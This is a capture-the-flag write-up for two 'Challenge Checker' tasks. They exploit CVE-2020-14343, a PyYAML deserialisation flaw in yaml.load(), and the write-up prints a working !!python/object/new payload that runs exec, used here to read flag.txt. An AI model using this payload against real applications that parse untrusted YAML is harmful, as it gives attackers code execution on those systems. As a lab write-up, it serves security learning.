Challenge Checker
PyYAML deserialisation vulnerability (CVE-2020-14343).

Challenge Checker 1

We are prompted to paste in YAML data. We can see from the code that yaml.load() is used to load the data.
1
from yaml import load
2
​
3
...
4
​
5
def check(raw_data) -> "Tuple[list[str], list[str]]":
6
data = load(raw_data)
Copied!
There exists a deserialization exploit in PyYAML that was only fixed in version 5.4.1.
We can see from requirements.txt that the version is 3.13, which is vulnerable.
1
PyYAML==3.13
2
termcolor==1.1.0
Copied!
From the GitHub issue, we can find some of the proof of concept exploits. For instance:
1
- !!python/object/new:str
2
args: []
3
state: !!python/tuple
4
- "RCE_HERE"
5
- !!python/object/new:staticmethod
6
args: [0]
7
state:
8
update: !!python/name:exec
Copied!
So, in the chall.yaml, I simply added this PoC under authors:
1
authors:
2
- anli
3
- Edward Feng
4
- !!python/object/new:str
5
args: []
6
state: !!python/tuple
7
- "print(open('flag.txt').read())"
8
- !!python/object/new:staticmethod
9
args: [0]
10
state:
11
update: !!python/name:exec
12
visible: true
Copied!
This executes print(open('flag.txt').read()) and reads the flag.

Challenge Checker 2

The only change is that PyYAML is now version 5.3.1.
1
PyYAML==5.3.1
2
termcolor==1.1.0
Copied!
But the exploit we used previously affected all versions below 5.4.1, so it works here too.